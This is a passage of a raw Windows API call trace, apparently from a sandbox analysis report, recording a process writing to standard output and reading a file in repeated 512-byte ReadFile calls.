GetFileType (hFile=0x50) returned 0x1 [0132.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.988] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.988] GetFileType (hFile=0x50) returned 0x1 [0132.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.988] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.988] GetFileType (hFile=0x50) returned 0x1 [0132.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.988] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.988] GetFileType (hFile=0x50) returned 0x1 [0132.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.988] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.988] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.988] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.988] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.988] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.989] GetFileType (hFile=0x50) returned 0x1 [0132.989] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.989] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.989] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.989] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.989] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.989] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.989] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.989] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.989] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.990] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.990] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.990] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.990] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.990] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.990] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.990] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.990] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.990] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.990] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.990] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.990] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.990] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.990] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.990] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.991] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.991] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.991] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.991] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.991] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.991] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.991] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.991] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.991] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.991] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.991] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.991] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.992] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.992] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.992] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.992] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.992] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.992] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.992] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.992] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.992] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.992] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.992] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.992] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.992] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.993] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.993] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.993] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.993] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.993] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.993] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.993] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.993] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.993] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.993] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.993] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.993] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.993] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.994] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.994] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.994] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.994] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.994] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.994] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.994] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.994] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.994] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.994] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.994] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.995] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.995] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.995] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.995] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.995] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.995] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.995] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.995] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.995] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.996] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.996] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.996] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.996] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.996] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.996] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.996] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.996] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.996] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.996] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.996] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.997] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, 